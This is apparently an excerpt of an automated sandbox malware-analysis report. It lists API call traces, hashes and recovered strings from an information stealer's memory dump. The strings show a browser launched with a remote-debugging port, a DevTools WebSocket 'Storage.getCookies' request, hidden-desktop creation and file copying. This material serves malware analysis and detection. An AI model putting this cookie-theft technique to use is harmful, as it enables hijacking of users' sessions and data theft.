                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 1346933759-0
                                  • Opcode ID: 7ea9b1f754419953675ad5e51b39da78b5c65542417851e83e2b83ecc6946756
                                  • Instruction ID: e6a4d35a9186ff586ad80563aaf477a43f284c1bbb2bb1b820c51490ce5b6fb5
                                  • Opcode Fuzzy Hash: 7ea9b1f754419953675ad5e51b39da78b5c65542417851e83e2b83ecc6946756
                                  • Instruction Fuzzy Hash: 61C151719102069BCB22AF64DC89EAF77F8AF54301F454528FC49AB261DB34EC59DBA0
                                  APIs
                                  • memset.MSVCRT ref: 00349790
                                  • lstrcat.KERNEL32(?,?), ref: 003497A0
                                  • lstrcat.KERNEL32(?,?), ref: 003497B1
                                  • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 003497C3
                                  • memset.MSVCRT ref: 003497D7
                                    • Part of subcall function 00363E70: lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00363EA5
                                    • Part of subcall function 00363E70: lstrcpy.KERNEL32(00000000,00FACBE8), ref: 00363ECF
                                    • Part of subcall function 00363E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0034134E,?,0000001A), ref: 00363ED9
                                  • wsprintfA.USER32 ref: 00349806
                                  • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00349827
                                  • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00349844
                                    • Part of subcall function 003646A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003646B9
                                    • Part of subcall function 003646A0: Process32First.KERNEL32(00000000,00000128), ref: 003646C9
                                    • Part of subcall function 003646A0: Process32Next.KERNEL32(00000000,00000128), ref: 003646DB
                                    • Part of subcall function 003646A0: StrCmpCA.SHLWAPI(?,?), ref: 003646ED
                                    • Part of subcall function 003646A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00364702
                                    • Part of subcall function 003646A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00364711
                                    • Part of subcall function 003646A0: CloseHandle.KERNEL32(00000000), ref: 00364718
                                    • Part of subcall function 003646A0: Process32Next.KERNEL32(00000000,00000128), ref: 00364726
                                    • Part of subcall function 003646A0: CloseHandle.KERNEL32(00000000), ref: 00364731
                                  • lstrcat.KERNEL32(00000000,?), ref: 00349878
                                  • lstrcat.KERNEL32(00000000,?), ref: 00349889
                                  • lstrcat.KERNEL32(00000000,00374B60), ref: 0034989B
                                  • memset.MSVCRT ref: 003498AF
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003498D4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00349903
                                  • StrStrA.SHLWAPI(00000000,00FADEB0), ref: 00349919
                                  • lstrcpyn.KERNEL32(005793D0,00000000,00000000), ref: 00349938
                                  • lstrlen.KERNEL32(?), ref: 0034994B
                                  • wsprintfA.USER32 ref: 0034995B
                                  • lstrcpy.KERNEL32(?,00000000), ref: 00349971
                                  • Sleep.KERNEL32(00001388), ref: 003499E7
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 00341557
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 00341579
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 0034159B
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 003415FF
                                    • Part of subcall function 003492B0: strlen.MSVCRT ref: 003492E1
                                    • Part of subcall function 003492B0: strlen.MSVCRT ref: 003492FA
                                    • Part of subcall function 003492B0: strlen.MSVCRT ref: 00349399
                                    • Part of subcall function 003492B0: strlen.MSVCRT ref: 003493E6
                                    • Part of subcall function 00364740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00364759
                                    • Part of subcall function 00364740: Process32First.KERNEL32(00000000,00000128), ref: 00364769
                                    • Part of subcall function 00364740: Process32Next.KERNEL32(00000000,00000128), ref: 0036477B
                                    • Part of subcall function 00364740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0036479C
                                    • Part of subcall function 00364740: TerminateProcess.KERNEL32(00000000,00000000), ref: 003647AB
                                    • Part of subcall function 00364740: CloseHandle.KERNEL32(00000000), ref: 003647B2
                                    • Part of subcall function 00364740: Process32Next.KERNEL32(00000000,00000128), ref: 003647C0
                                    • Part of subcall function 00364740: CloseHandle.KERNEL32(00000000), ref: 003647CB
                                  • CloseDesktop.USER32(?), ref: 00349A1C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                  • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                  • API String ID: 958055206-1862457068
                                  • Opcode ID: 8782df9a556e0dad7408507e64eb4c590c3b34e1fa984527e9a2d3afede2c000
                                  • Instruction ID: 43cf48111bdf095b979d9d3de4cd7e600123e1d522e67205ca4231a4b61d286b
                                  • Opcode Fuzzy Hash: 8782df9a556e0dad7408507e64eb4c590c3b34e1fa984527e9a2d3afede2c000
                                  • Instruction Fuzzy Hash: B5918471A50218AFDB11DF64DC49FEE77B8AF54700F508095FA0DAB281DF70AA849FA0
                                  APIs
                                  • wsprintfA.USER32 ref: 0035E22C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0035E243
                                  • StrCmpCA.SHLWAPI(?,003717A0), ref: 0035E263
                                  • StrCmpCA.SHLWAPI(?,003717A4), ref: 0035E27D
                                  • wsprintfA.USER32 ref: 0035E2A2
                                  • StrCmpCA.SHLWAPI(?,0036CFEC), ref: 0035E2B4
                                  • wsprintfA.USER32 ref: 0035E2D1
                                    • Part of subcall function 0035EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0035EE12
                                  • wsprintfA.USER32 ref: 0035E2F0
                                  • PathMatchSpecA.SHLWAPI(?,?), ref: 0035E304
                                  • lstrcat.KERNEL32(?,00FAE3B0), ref: 0035E335
                                  • lstrcat.KERNEL32(?,00371794), ref: 0035E347
                                  • lstrcat.KERNEL32(?,?), ref: 0035E358
                                  • lstrcat.KERNEL32(?,00371794), ref: 0035E36A
                                  • lstrcat.KERNEL32(?,?), ref: 0035E37E
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 0035E394
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035E3D2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035E422
                                  • DeleteFileA.KERNEL32(?), ref: 0035E45C
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 00341557
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 00341579
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 0034159B
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 003415FF
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0035E49B
                                  • FindClose.KERNEL32(00000000), ref: 0035E4AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 1375681507-2848263008
                                  • Opcode ID: 6e9f9b119f666e9b1c13880c3f9a1a127e33f0dfb3ef446401f66b30d0d7ede0
                                  • Instruction ID: 6e31adb681b99513c25b2d2f5b91ce017834cfe69ba69c0253f2c3d41790668e
                                  • Opcode Fuzzy Hash: 6e9f9b119f666e9b1c13880c3f9a1a127e33f0dfb3ef446401f66b30d0d7ede0
                                  • Instruction Fuzzy Hash: 578192719102189BCB25EF64EC49EEF77B8BF54301F404998F90A97150EF34AA88DFA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003416E2
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00341719
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034176C
                                  • lstrcat.KERNEL32(00000000), ref: 00341776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003417A2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003418F3
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003418FE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat
                                  • String ID: \*.*
                                  • API String ID: 2276651480-1173974218
                                  • Opcode ID: bf58bcb11ee7fe103ae984f66a94f2dd6aba89f190adc5f613d371a4026c0b7a
                                  • Instruction ID: 1bd27726bc36bf4459a7a3b172f654ecdcbbe021a1402accb0fe1e9b6316f4e3
                                  • Opcode Fuzzy Hash: bf58bcb11ee7fe103ae984f66a94f2dd6aba89f190adc5f613d371a4026c0b7a
                                  • Instruction Fuzzy Hash: ED81603191061A9BCB23EF68DC89AAF7BF4AF14300F454124F809AF251DB34BD95DBA1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0035DD45
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0035DD4C
                                  • wsprintfA.USER32 ref: 0035DD62
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0035DD79
                                  • StrCmpCA.SHLWAPI(?,003717A0), ref: 0035DD9C
                                  • StrCmpCA.SHLWAPI(?,003717A4), ref: 0035DDB6
                                  • wsprintfA.USER32 ref: 0035DDD4
                                  • DeleteFileA.KERNEL32(?), ref: 0035DE20
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 0035DDED
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 00341557
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 00341579
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 0034159B
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 003415FF
                                    • Part of subcall function 0035D980: memset.MSVCRT ref: 0035D9A1
                                    • Part of subcall function 0035D980: memset.MSVCRT ref: 0035D9B3
                                    • Part of subcall function 0035D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0035D9DB
                                    • Part of subcall function 0035D980: lstrcpy.KERNEL32(00000000,?), ref: 0035DA0E
                                    • Part of subcall function 0035D980: lstrcat.KERNEL32(?,00000000), ref: 0035DA1C
                                    • Part of subcall function 0035D980: lstrcat.KERNEL32(?,00FADF28), ref: 0035DA36
                                    • Part of subcall function 0035D980: lstrcat.KERNEL32(?,?), ref: 0035DA4A
                                    • Part of subcall function 0035D980: lstrcat.KERNEL32(?,00FAC578), ref: 0035DA5E
                                    • Part of subcall function 0035D980: lstrcpy.KERNEL32(00000000,?), ref: 0035DA8E
                                    • Part of subcall function 0035D980: GetFileAttributesA.KERNEL32(00000000), ref: 0035DA95
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0035DE2E
                                  • FindClose.KERNEL32(00000000), ref: 0035DE3D
                                  • lstrcat.KERNEL32(?,00FAE3B0), ref: 0035DE66
                                  • lstrcat.KERNEL32(?,00FAD230), ref: 0035DE7A
                                  • lstrlen.KERNEL32(?), ref: 0035DE84
                                  • lstrlen.KERNEL32(?), ref: 0035DE92
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035DED2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 4184593125-2848263008
                                  • Opcode ID: 60dec91077e686250560adb34a39d6aa94d35e4f603588c21eaec4152261bbdf
                                  • Instruction ID: cefcd8f4eb90bd0abc1270d69c079ba28c8880f6fdd49dddbc5fde81d8eac34d
                                  • Opcode Fuzzy Hash: 60dec91077e686250560adb34a39d6aa94d35e4f603588c21eaec4152261bbdf
                                  • Instruction Fuzzy Hash: FF616771910208ABCB21EF74EC49EEE77B5BF58311F404594F909AB251DF34AA98DF60
                                  APIs
                                  • wsprintfA.USER32 ref: 0035D54D
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0035D564
                                  • StrCmpCA.SHLWAPI(?,003717A0), ref: 0035D584
                                  • StrCmpCA.SHLWAPI(?,003717A4), ref: 0035D59E
                                  • lstrcat.KERNEL32(?,00FAE3B0), ref: 0035D5E3
                                  • lstrcat.KERNEL32(?,00FAE400), ref: 0035D5F7
                                  • lstrcat.KERNEL32(?,?), ref: 0035D60B
                                  • lstrcat.KERNEL32(?,?), ref: 0035D61C
                                  • lstrcat.KERNEL32(?,00371794), ref: 0035D62E
                                  • lstrcat.KERNEL32(?,?), ref: 0035D642
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035D682
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035D6D2
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0035D737
                                  • FindClose.KERNEL32(00000000), ref: 0035D746
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 50252434-4073750446
                                  • Opcode ID: 41f7e305b9bd3d1739c6d1d72c39d04db6095e2ab783b46d91d8a713ef186867
                                  • Instruction ID: dadfad409833514d2e6ee75e4e677a4179ff4d5d7f7aa9da6be95f4df5c68ee7
                                  • Opcode Fuzzy Hash: 41f7e305b9bd3d1739c6d1d72c39d04db6095e2ab783b46d91d8a713ef186867
                                  • Instruction Fuzzy Hash: 4B6186719101199BCB21EF74DC88AEE77B8EF58301F4084A5F949A7250DB34AA99DFA0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_
                                  • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                  • API String ID: 909987262-758292691
                                  • Opcode ID: a70b3ff11be41c0568ea7f9e8189a23c7fed095d6b5b49c2b4ffeca4e30dc276
                                  • Instruction ID: 094d354c3525d053e0b753ebce6fdb57696aee6b5336016b734331529a5f4c79
                                  • Opcode Fuzzy Hash: a70b3ff11be41c0568ea7f9e8189a23c7fed095d6b5b49c2b4ffeca4e30dc276
                                  • Instruction Fuzzy Hash: A0A26871E112699FDF21DFA8C8807EDBBB6BF48300F1485A9D509AB245DB705E85CFA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003523D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003523F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00352402
                                  • lstrlen.KERNEL32(\*.*), ref: 0035240D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035242A
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 00352436
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035246A
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00352486
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
